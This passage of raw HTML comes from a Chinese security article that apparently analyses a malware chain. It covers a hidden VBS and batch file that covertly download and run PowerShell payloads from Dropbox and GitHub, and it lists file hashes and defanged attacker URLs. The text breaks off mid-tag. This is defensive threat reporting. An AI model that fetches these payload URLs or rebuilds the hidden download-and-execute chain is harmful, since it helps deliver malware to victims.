&#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">TMP0392.exe</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">，然后通过</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">T</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">MP0392.exe</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">从远程地址</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“https[:]//www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7e&amp;st=ip1rnvm2&amp;dl=0”</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">下载</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“taskschd.vbs”</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">文件。最后将</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">taskschd.vbs</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”加隐藏属性后执行，以避免受害者发现。</span></font></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.06618531889290012" data-s="300,640" data-type="png" data-w="831" type="block" data-imgfileid="100024874" src="https://wechat2rss.xlab.app/img-proxy/?k=f71c5371&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLCJGQlL7sLvzuU6bsmnxjYHbj6PtiaGHM9U1AESJt1jZ4mcNOR4fyBwzuViaLmfz6JHR6d0zyjqiaBVpbiaqjoicuJKcIzpVic6Meaw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="text-indent: 0px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">3. </span></span><b><font face="黑体"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">攻击组件分析</span></span></font></b></h2><h3 style="text-indent: 0px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">3.1. </span></span><b><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">脚本组件</span></span></font></b></h3><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">taskschd.vbs</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”是一个V</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">BS</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">脚本文件，信息如下：</span></font></p><div><div><p><table style="width:573px;"><tbody><tr><td data-colwidth="160"><p><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">MD5</span></span></span></p></td><td data-colwidth="413"><p><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">d9d7d5feb2abc828b58142fc63509d80</span></span></span></p></td></tr><tr><td data-colwidth="160"><p><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">文件大小</span></span></span></p></td><td data-colwidth="413"><p><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">1.52 KB (1,562 字节)</span></span></span></p></td></tr><tr><td data-colwidth="160"><p data-mpa-action-id="mp3ov52sr5a"><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">文件名</span></span></span></p></td><td data-colwidth="413"><p data-mpa-action-id="mp3ov93q1h1e"><span style="font-size: 16px;"><span style="border-color: #000000;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">taskschd.vbs</span></span></span></p></td></tr></tbody></table></p></div></div><p style="text-indent: 2em;text-align: left;margin-top: 16px;margin-bottom: 16px;"><span leaf="">该脚本</span><span data-pm-slice="0 0 []"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">是一个被混淆之后的</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">V</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">BS</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">脚本，攻击者通过</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">R</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">eplace</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">函数增加了大量的干扰分析的内容，经过去混淆之后，</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">taskschd.vbs</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”文件内容如下，该文件功能就是从“</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">https[:]//raw.githubusercontent.com/shantez4/EDGTy/refs/heads/main/hawek.ini</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">处下载目标文件，并保存</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">a2d3acd4-6456-4029-8503-6cc4267d9b.tmp.bat</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”，然后W</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">MI</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">隐秘执行该</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">bat脚本文件。</span></font></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5391095066185319" data-s="300,640" data-type="png" data-w="831" type="block" data-imgfileid="100024875" src="https://wechat2rss.xlab.app/img-proxy/?k=ea22d3ce&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKbH718pPwFf8zUic51f1wJ3h0s5yH3Vt9R6axw8f86sqfdhrWHJZn5lKRmWgCvhKAWiberibhTibRlHUBpaAhZSXBPNNUbelLORWw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;" data-pm-slice="0 0 []"><font face="仿宋"><span data-pm-slice="0 0 []"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“a2d3acd4-6456-4029-8503-6cc4267d9b.tmp.bat”</span></font></span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">是一个</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">bat批处理文件，具体信息如下：</span></font></font></p><div><div><p><table style="width:575px;"><tbody><tr><td data-colwidth="108"><p><span style="border-color: #000000;font-size: 16px;"><span leaf="">MD5</span></span></p></td><td data-colwidth="467"><p><span style="border-color: #000000;font-size: 16px;"><span leaf="">23da5ff2ed7bd4ac5a</span><span leaf="">2a148afc037b6a</span></span></p></td></tr><tr><td data-colwidth="108"><p><span style="border-color: #000000;font-size: 16px;"><span leaf="">文件大小</span></span></p></td><td data-colwidth="467"><p><span style="border-color: #000000;font-size: 16px;"><span leaf="">499 字节 (499 字节)</span></span></p></td></tr><tr><td data-colwidth="108"><p><span style="border-color: #000000;font-size: 16px;"><span leaf="">文件名</span></span></p></td><td data-colwidth="467"><p data-mpa-action-id="mp3ovlkcxj8"><span style="border-color: #000000;font-size: 16px;"><span leaf="">a2d3acd4-6456-4029-8503-6cc4267d9b.tmp.bat</span></span></p></td></tr></tbody></table></p></div></div><p style="margin-top: 16px;margin-bottom: 16px;text-indent: 2em;" data-pm-slice="0 0 []"><font face="仿宋"><font face="仿宋"><span data-pm-slice="0 0 []"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“a2d3acd4-6456-4029-8503-6cc4267d9b.tmp.bat”</span></font></span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">文件的功能是分别从</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">dropbox.com</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">和</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">github</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">.com</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">两个公共存储平台下载文件分别保存到</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“Eudksref.ps1”</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">和</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Eudksre.ps1</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”，然后通过P</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">owerShell</span><font 